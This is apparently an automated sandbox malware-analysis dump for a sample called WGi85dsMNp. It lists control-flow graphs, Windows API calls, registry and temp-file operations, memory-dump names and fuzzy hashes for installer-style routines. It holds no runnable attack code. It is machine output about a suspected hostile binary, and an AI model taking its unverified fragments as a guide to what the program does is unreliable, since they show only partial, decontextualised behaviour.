                                                                                                      control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 925 4027dc-4027e4 924->925 926 40267e-40268d call 406348 924->926 925->920 926->925 930 402693 926->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 935 402737-40273a 932->935 936 40274d-40275d call 405f61 932->936 933->925 934 4026c4-4026c9 933->934 934->925 939 4026cf-4026dd 934->939 935->936 937 40273c-402747 call 405fbf 935->937 936->925 945 40275f 936->945 937->925 937->936 942 4026e3-4026f5 MultiByteToWideChar 939->942 943 402798-4027a4 call 40632f 939->943 942->945 946 4026f7-4026fa 942->946 943->922 948 402762-402765 945->948 949 4026fc-402707 946->949 948->943 951 402767-40276c 948->951 949->948 952 402709-40272e SetFilePointer MultiByteToWideChar 949->952 953 4027a9-4027ad 951->953 954 40276e-402773 951->954 952->949 955 402730 952->955 956 4027ca-4027d6 SetFilePointer 953->956 957 4027af-4027b3 953->957 954->953 958 402775-402788 954->958 955->945 956->925 959 4027b5-4027b9 957->959 960 4027bb-4027c8 957->960 958->925 961 40278a-402790 958->961 959->956 959->960 960->925 961->931 962 402796 961->962 962->925
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 163830602-2366072709
                                                                                                      • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                      • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 970 40591f-40596a CreateDirectoryW 971 405970-40597d GetLastError 970->971 972 40596c-40596e 970->972 973 405997-405999 971->973 974 40597f-405993 SetFileSecurityW 971->974 972->973 974->972 975 405995 GetLastError 974->975 975->973
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                      • API String ID: 3449924974-1246513382
                                                                                                      • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                      • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                      • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                      • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 976 6f941777-6f9417b6 call 6f941b5f 980 6f9418d6-6f9418d8 976->980 981 6f9417bc-6f9417c0 976->981 982 6f9417c2-6f9417c8 call 6f942352 981->982 983 6f9417c9-6f9417d6 call 6f942394 981->983 982->983 988 6f941806-6f94180d 983->988 989 6f9417d8-6f9417dd 983->989 990 6f94182d-6f941831 988->990 991 6f94180f-6f94182b call 6f942569 call 6f9415b4 call 6f941272 GlobalFree 988->991 992 6f9417df-6f9417e0 989->992 993 6f9417f8-6f9417fb 989->993 997 6f941833-6f94187c call 6f9415c6 call 6f942569 990->997 998 6f94187e-6f941884 call 6f942569 990->998 1014 6f941885-6f941889 991->1014 995 6f9417e2-6f9417e3 992->995 996 6f9417e8-6f9417e9 call 6f942aac 992->996 993->988 999 6f9417fd-6f9417fe call 6f942d37 993->999 1002 6f9417e5-6f9417e6 995->1002 1003 6f9417f0-6f9417f6 call 6f942724 995->1003 1010 6f9417ee 996->1010 997->1014 998->1014 1007 6f941803 999->1007 1002->988 1002->996 1013 6f941805 1003->1013 1007->1013 1010->1007 1013->988 1018 6f9418c6-6f9418cd 1014->1018 1019 6f94188b-6f941899 call 6f94252c 1014->1019 1018->980 1024 6f9418cf-6f9418d0 GlobalFree 1018->1024 1026 6f9418b1-6f9418b8 1019->1026 1027 6f94189b-6f94189e 1019->1027 1024->980 1026->1018 1029 6f9418ba-6f9418c5 call 6f94153d 1026->1029 1027->1026 1028 6f9418a0-6f9418a8 1027->1028 1028->1026 1030 6f9418aa-6f9418ab FreeLibrary 1028->1030 1029->1018 1030->1026
                                                                                                      APIs
                                                                                                        • Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DB2
                                                                                                        • Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DB7
                                                                                                        • Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DBC
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F941825
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6F9418AB
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F9418D0
                                                                                                        • Part of subcall function 6F942352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F942383
                                                                                                        • Part of subcall function 6F942724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9417F6,00000000), ref: 6F9427F4
                                                                                                        • Part of subcall function 6F9415C6: wsprintfW.USER32 ref: 6F9415F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3962662361-3916222277
                                                                                                      • Opcode ID: e480836ac1d044e065c230c88fd373b086140ba351c1e4e50c7ac59fb85899b7
                                                                                                      • Instruction ID: 66fb19808cfbfe50dc4458b58fc53588b5f5594bf8891aed65163e2733e2b8fe
                                                                                                      • Opcode Fuzzy Hash: e480836ac1d044e065c230c88fd373b086140ba351c1e4e50c7ac59fb85899b7
                                                                                                      • Instruction Fuzzy Hash: D741AE714003049ADB1A9F749884BD637ACBF37328F144166E9299A2D7DB78E0E8CB60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1033 402032-40203e 1034 402044-40205a call 402c41 * 2 1033->1034 1035 4020fd-4020ff 1033->1035 1046 40206a-402079 LoadLibraryExW 1034->1046 1047 40205c-402068 GetModuleHandleW 1034->1047 1036 40224b-402250 call 401423 1035->1036 1042 402ac5-402ad4 1036->1042 1043 40288b-402892 1036->1043 1043->1042 1048 40207b-40208a call 406831 1046->1048 1049 4020f6-4020f8 1046->1049 1047->1046 1047->1048 1053 4020c5-4020ca call 405450 1048->1053 1054 40208c-402092 1048->1054 1049->1036 1058 4020cf-4020d2 1053->1058 1055 402094-4020a0 call 401423 1054->1055 1056 4020ab-4020be call 6f941777 1054->1056 1055->1058 1067 4020a2-4020a9 1055->1067 1062 4020c0-4020c3 1056->1062 1058->1042 1060 4020d8-4020e2 call 403a78 1058->1060 1060->1042 1066 4020e8-4020f1 FreeLibrary 1060->1066 1062->1058 1066->1042 1067->1058
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                      • String ID: !s
                                                                                                      • API String ID: 334405425-2711790073
                                                                                                      • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                      • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                      • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                      • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1069 4023e4-402415 call 402c41 * 2 call 402cd1 1076 402ac5-402ad4 1069->1076 1077 40241b-402425 1069->1077 1078 402427-402434 call 402c41 lstrlenW 1077->1078 1079 402438-40243b 1077->1079 1078->1079 1082 40243d-40244e call 402c1f 1079->1082 1083 40244f-402452 1079->1083 1082->1083 1087 402463-402477 RegSetValueExW 1083->1087 1088 402454-40245e call 4031d6 1083->1088 1091 402479 1087->1091 1092 40247c-40255d RegCloseKey 1087->1092 1088->1087 1091->1092 1092->1076 1094 40288b-402892 1092->1094 1094->1076
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseValuelstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoC476.tmp
                                                                                                      • API String ID: 2655323295-1119368686
                                                                                                      • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                      • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                      • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                      • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1095 405f0d-405f19 1096 405f1a-405f4e GetTickCount GetTempFileNameW 1095->1096 1097 405f50-405f52 1096->1097 1098 405f5d-405f5f 1096->1098 1097->1096 1099 405f54 1097->1099 1100 405f57-405f5a 1098->1100 1099->1100
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF), ref: 00405F46
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                      • API String ID: 1716503409-44229769
                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                      APIs
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$Enum
                                                                                                      • String ID:
                                                                                                      • API String ID: 464197530-0
                                                                                                      • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                      • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                        • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Unnumberable,?,00000000,000000F0), ref: 0040164D
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 00401640
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                      • String ID: C:\Users\user\AppData\Local\Iw\Unnumberable
                                                                                                      • API String ID: 1892508949-3164773890
                                                                                                      • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                      • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                      • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                      • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                      APIs
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                      • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
